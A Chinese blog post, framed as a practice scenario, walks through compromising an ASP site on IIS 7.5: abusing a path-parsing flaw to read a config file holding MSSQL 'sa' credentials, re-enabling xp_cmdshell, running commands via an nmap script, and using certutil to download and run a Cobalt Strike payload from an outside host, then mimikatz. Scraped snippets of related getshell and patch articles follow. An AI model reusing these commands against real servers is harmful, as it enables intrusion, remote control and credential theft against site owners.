iis7.5 解析漏洞 php,asp网站+iis7.5解析漏洞配合远程下载getshell

最新推荐文章于 2024-06-18 17:22:33 发布
最新推荐文章于 2024-06-18 17:22:33 发布
阅读量1.6k 收藏 1
点赞数 1
文章标签: iis7.5 解析漏洞 php

搭建asp网站+iis7.5中间练习场景:

一个asp网站有iis7.5解析漏洞 但是扫了目录没发现上传文件的地方,也没有会员头像那些怎么办呢

x.com/index.asp/.php 直接查看首页源码,包含了他的配置文件

x.com/conn/conn.asp/.php'database='127.0.0.1'

'user='sa'

'password='xs2131zz'

'数据库如果是mssql选择ture,access留空

'type='true'

发现用了mssql服务器

ping网站以后发现没做CDN,如果做了cdn,IP的描述会提示[xxcdn.com]等等nmap -sV -sT -Pn --open -v 177.15x.x

扫描IP发现开了1433端口

开启虚拟机,打开sqltool  连接上执行命令;exec master..xp_cmdshell 'whoami'

提示未能找到存储过程'master..xpcmdshell'. ,我们恢复下EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

也可以用nmap执行mssql命令nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 192.168.137.4

这里直接用certutil下载我们的cs payload并执行certutil -urlcache -split -f http://www.xxoo.ml/artifact.exe C:\Windows\Temp\arit.exe

ok,上线了

然后右键目标run mimikatz等后期工作,描述的很轻松,其实走了很多弯路,机器上有安全狗+护卫神,echo写不了木马,只能使用远程下载配合cobalstrike上线了

weixin_39839410
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
iis7.5解析漏洞(iis7.5 解析漏洞解决方案)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
04-13 5763
iis7.5解析漏洞解决方案,第1种方案:继续使用FastCGI方式调用PHP,要解决这个安全问题可以在php.ini里设置 cgi.fix_pathinfo=0 ,修改保存后建议重启iis(注意可能影响到某些应用程序功能)。 第2种方案:使用ISAPI的方式调用PHP。(注意:PHP5.3.10已经摒弃了 ISAPI 方式) 第3种方案:可以使用其他web服务器软件,如apache等。 【实战解决方案】增强IIS设置(IIS7站长之家 测试通过) 在IIS里找到“处理程序映射”,然后对PHP
IIS 7.5 解析错误 命令执行漏洞解决方案
09-30
主要介绍了IIS 7.5 解析错误 命令执行漏洞解决方案,需要的朋友可以参考下
IIS PUT漏洞原理和复现
p_utao的博客
01-27 791
漏洞成因 IIS server在WEB服务拓展中开启了WebDAV,配置了写入权限,脚本资源访问权限。导致任意文件上传 本地搭建 首先允许webDAV 查看IP命令为ipconfig 把IP地址调整为这台机器的IP地址 返回访问该IP 因为这里主要是为了锻炼写POC,当然也可以直接使用桂林老兵验证直接写shell POC验证 POC验证: import requests url = "http://IP" r = requests.options(url) result = r.headers[
解决方案-iis7.5解析漏洞-新手白帽子知识点
最新发布
程序员三九的博客
06-18 427
首先用2003搭建IIS服务器点击添加或删除角色点击下一步点击自定义配置然后直接下一步到底。然后再管理工具里
iis7.5加fck解析漏洞后台拿shell
weixin_30825199的博客
01-23 724
记录下来 经常用到 电脑准备格式化了 一切从头开始 每天浑浑噩噩的不知道干什么。认准一样东西 认认真真的学 IIS6.0解析漏洞,可以上传a.asp;.jps或者a.asp;a.jpg或者a.asp目录下传任意格式小马,都会解析 这次讲的是IIS7.5解析漏洞, http://www.xxoo.com/fckeditor/editor/fck...
IIS7&7.5解析漏洞
热门推荐
笨笨的专栏
07-06 5万+
IIS7/7.5在Fast-CGI运行模式下,在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析php 文件。
iis7.5文件解析漏洞
box
02-05 6239
文件解析漏洞总结 0x00 常见的文件解析漏洞 文件上传漏洞通常与Web容器的解析漏洞配合利用 常见Web容器有IIS、Nginx、Apache、Tomcat等 0x01 IIS 7.0/IIS 7.5/Nginx <=0.8.37 解析漏洞 在默认Fast-CGI开启状况下,在一个文件路径(/xx.jpg)后面加上/xx.PHP会将 /xx.jpg/xx.php 解析php 文件。 开启CGI 添加模块映射 修改php.ini文件 cgi.fix_pathinfo=0 修改为 cgi
渗透测试系列之iis解析漏洞getshell+内网渗透
win176489的博客
06-27 3074
本次渗透测试经验分享仅供大家学习交流 本次利用的环境为内网web服务器windows2003(模拟内网主机 ip192.168.152.128 192.168.79.128) 一台外网主机 (ip xxx.xxx.xxx.xxx ) 攻击机win10(ip 192.168.31.169) kali机(192.168.31.43) 环...
IIS6.0解析漏洞——PUT方式上传文件
buffedon的博客
08-26 3212
IIS6.0解析漏洞IIS6.0解析漏洞解析漏洞原理介绍PUT上传原理PUT上传探测PUT上传利用(漏洞复现)PUT的利用COPY的利用PUT文件上传防范解析漏洞防范补充:HTTP 中请求方式汇总1. OPTION2. HEAD3. PUT4. DELETE5. TRACE6. CONNECT IIS6.0解析漏洞 解析漏洞原理介绍 1. 当建立 *.asa、*.asp 格式的文件夹时,其目录下的任意文件都被IIS当做asp文件解析 2. 当文件是 *.asp;1.jpg ,IIS6.0同样会将文件作为a
Web安全基础-命令执行getshell
HAKUNAMATATATTA的博客
11-23 1206
应用未对用户输入做严格得检查过滤,导致用户输入得参数被当成命令来执行。
靶机记录(十三):SickOs1.2 - IIS 中 PUT 漏洞的利用
weixin_47306547的博客
11-09 1768
目录 环境 主机发现 端口扫描 漏洞挖掘 GetShell 法一 法二 法三 提权 chkrootkit 漏洞提权 法一 法二 法三 防火墙规则 清痕迹,留后门 环境 链接:https://pan.baidu.com/s/1OI1bYsnS_LBvMIrQCt1yuw 提取码:lish 主机发现 端口扫描 漏洞挖掘 查看网页支持的访问方式: nmap --script=http-methods --...
最新的ASPIIS安全漏洞
03-23
ASP以其灵活、简单、实用、强大的特性迅速风靡全球网站的时候,其本身的一些缺陷、漏洞也正威胁着所有的网站开发者,继上一篇中介绍了一些IIS的系统漏洞ASP的安全问题后,本期中将针对最新的ASPIIS安全漏洞进行详细的探讨,请所有的ASP网站开发者密切关注,提高警惕。
winserver2008/iis7缓冲区溢出提权0day
09-13
一个很NB的工具。适用于iis7/iis7.5。溢出提权。 webshell提权、本地提权居家、放火必备。
文件上传漏洞训练平台.zip
10-14
攻击者通常会尝试上传可执行文件(如PHPASP、JSP等)来获取Webshell,即所谓的"getshell",从而能够执行任意系统命令,危害网络安全。 第一关至第二十关的训练可能涵盖了以下知识点: 1. **基础验证检查**:了解...
getshell2aaaaaaaa
03-28
- 尝试上传不同类型的脚本文件,如IIS容器环境下的ASP文件,即使网站主要是ASPX或PHP类型,也可以上传PHP文件尝试获取Shell。 - 利用解析漏洞,如通过上传双扩展名文件或大小写混合的文件名来绕过限制。 - 测试旁...
GetShell的姿势总结1
08-03
解析漏洞GetShell** 解析漏洞通常与文件上传漏洞结合使用,让图片马或其他非脚本文件被解析为可执行的脚本。以下是一些常见的服务器解析漏洞: - **IIS**:IIS解析漏洞常常导致静态文件被错误地解释为动态脚本...
IIS命令大全.docx
10-30
- **get 或 recv**: 从远程服务器下载文件到本地。 - **mget [remote-files]**: 从远程服务器批量下载文件。 - **mput local-files**: 将本地一批文件上传到远程服务器。 - **dir 或 ls [remote-directory] ...
OpenWBS 电商系统(手机端+PC端+微信+分销) X5.2.2
10-01
OpenWBS企业商城系统是以ASP+MSSQL/ACCESS开发的asp商城网站源码。 OpenWBS X4.0 专注于企业电商商城建设的系统,采用新一代全新架构,分层设计,拥有优秀的执行效率、扩展性和稳定性! 手
GetShell的姿势总结
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
03-20 4204
0x00 什么是WebShell 渗透测试工作的一个阶段性目标就是获取目标服务器的操作控制权限,于是WebShell便应运而生。Webshell中的WEB就是web服务,shell就是管理攻击者与操作系统之间的交互。Webshell被称为攻击者通过Web服务器端口对Web服务器有一定的操作权限,而webshell常以网页脚本的形式出现。常见的WebShell使用asp、jsp和php来编写,提供了如执行系统命令、文件上传下载、数据库管理等功能。 0x01 获取WebShell的方式 获取W...
Win7上配置IIS7.5+PHP+MySQL+Zend+PHPMyAdmin教程
"这篇文档详细介绍了在Windows 7操作系统中如何配置IIS 7.5以支持PHP、MySQL以及 Zend 和 phpMyAdmin 的步骤。主要涉及的软件版本包括php5.2.1、mysql5.0.67、ZendOptimizer-3.3.3以及phpmyadmin的一个稳定版本。" ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值